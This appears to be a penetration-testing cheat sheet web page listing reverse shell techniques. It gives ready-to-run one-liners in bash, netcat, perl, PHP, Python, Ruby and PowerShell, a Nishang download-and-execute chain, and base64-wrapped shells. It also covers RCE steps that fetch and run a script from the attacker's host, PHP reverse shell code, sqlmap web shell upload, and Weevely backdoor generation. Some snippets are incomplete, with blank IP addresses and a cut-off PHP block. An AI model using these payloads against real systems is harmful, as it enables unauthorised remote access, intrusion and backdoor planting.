Exploit Notes

Reverse Shell Cheat Sheet

Last modified: 2023-03-10

Privilege Escalation Reverse Shell Windows


First of all, we need to start listener in local machine to get an incoming connection.

nc -lvnp 4444

Cheat Sheets


bash -i >&  /dev/tcp/ 0>&1
bash -c 'bash -i >& /dev/tcp/ 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'

# For URL param

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f


ncat 4444 -e /bin/bash
ncat 4444 -e /bin/sh
ncat 4444 -c bash
ncat --udp 4444 -e /bin/bash

nc 4444 -e /bin/bash
nc 4444 -e /bin/sh
nc 4444 -c bash
nc --udp 4444 -e /bin/bash


perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Script File

    If we pass the script to php binary, create a PHP script as follow.

    // shell.php
    use Socket;
        exec("/bin/sh -i");

    Then run php.

    php ./shell.php


php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");'


python -c 'import socket,os,pty;s=socket.socket();s.connect(("", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'


ruby -rsocket -e'f=TCPSocket.open("",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


Nishang is the Offensive PowerShell for red team, penetration testing and offensive security.

  1. Preparing the Payload in Your Local Machine

    First off, copy the payload to the current working directory.

    cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
    mv Invoke-PowerShellTcp.ps1 shell.ps1

    Add the following code to the final line in the payload (shell.ps1).

    Invoke-PowerShellTcp -Reverse  -IPAddress <your-local-ip> -Port 4444
  2. Opening Wev Server in Your Local Machine

    To download the payload and execute the reverse shell in the target machine, open the web server in your local machine.

    python3 -m http.server 8000
  3. Downloading the Payload and Executing Reverse Shell

    In the target machine, download the local-hosted payload and run reverse shell.

    cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')

Reverse Shell with Base64

First create the base64 which executes reverse shell.

echo -n 'bash -i >& /dev/tcp/ 0>&1' | base64

Then copy the base64 text and paste into the payload.

echo -n "<Base64>" | base64 -d | bash

Reverse Shell over Websites

Shell Script & Remote Code Execution (RCE)

If we can find a website is vulnerable to Remote Code Execution but cannot Reverse Shell, we may be able to do that by uploading the script.

  1. Create a shell script to reverse shell.

    This file is named "revshell.sh".

    bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1
  2. Upload the script to website

    Start web server in local machine to upload the script.

    python3 -m http.server 8000

    Then upload it by remote code execution in target website.

    https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
    # or
    https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh

    To confirm the script uploaded, execute the following RCE.

  3. Get a shell

    Start listener for getting a shell in local machine.

    nc -lvnp 4444

    Now execute the uploaded script via RCE.

    # 1. Change permission for the script
    https://vulenrable.com/?cmd=chmod 777 revshell.sh
    # 2. Execute the script

    We should now get the target shell.

PHP Reverse Shell

php-reverse-shell is an awesome payload against a website using PHP.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit $ip and $port to your local ip:port in the payload

Update `$ip` and `$port` in the payload to your local ip and port.
Then upload the payload, or copy the content and paste to somewhere in the target website directly, and reload the page.

PHP Reverse Shell (without fsockopen, and for FreeBSD)

set_time_limit (0);
$ip = '';  // CHANGE THIS
$port = 4444;      // CHANGE THIS

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a")   // stderr is a pipe that the child will write to

$cwd = "/tmp";
$env = array('some_option' => 'aeiou');

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    fwrite($pipes[0], 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');

    echo stream_get_contents($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";

PHP Reverse Shell for Windows

We can get the payload in here.

Upload the Payload using SQLi

# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php

Useful Tools

  • Weevely3

    A web shell generator.

    1. Generate Backdoor with Password

      Credentials required.

      weevely generate <password> ./shell.php
    2. Upload the Payload to Target Website and Execute Commands

      weevely https://vulnerable.com/upload/shell.php <password> whoami
    3. Get a Shell

      weevely https://vulnerable.com/upload/shell.php <password>


Pwncat is a reverse and bind shell handler.

For listening from remote connection, run the following command.

pwncat-cs -lp 4444

Commands in Pwncat Shell

After reverse connecting, we can execute commands either local or remote.

# Switch between Local and Remote shell

# Upload a file to target machine (e.g. upload example.txt from local to remote)
(local) upload ./example.txt /tmp/example.txt

Upgrade to a Full Functional Shell

After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant.

SHELL=/bin/bash script -q /dev/null
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

The commands below make our shell even more perfect.

stty raw -echo;fg
Enter x2
export TERM=xterm

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.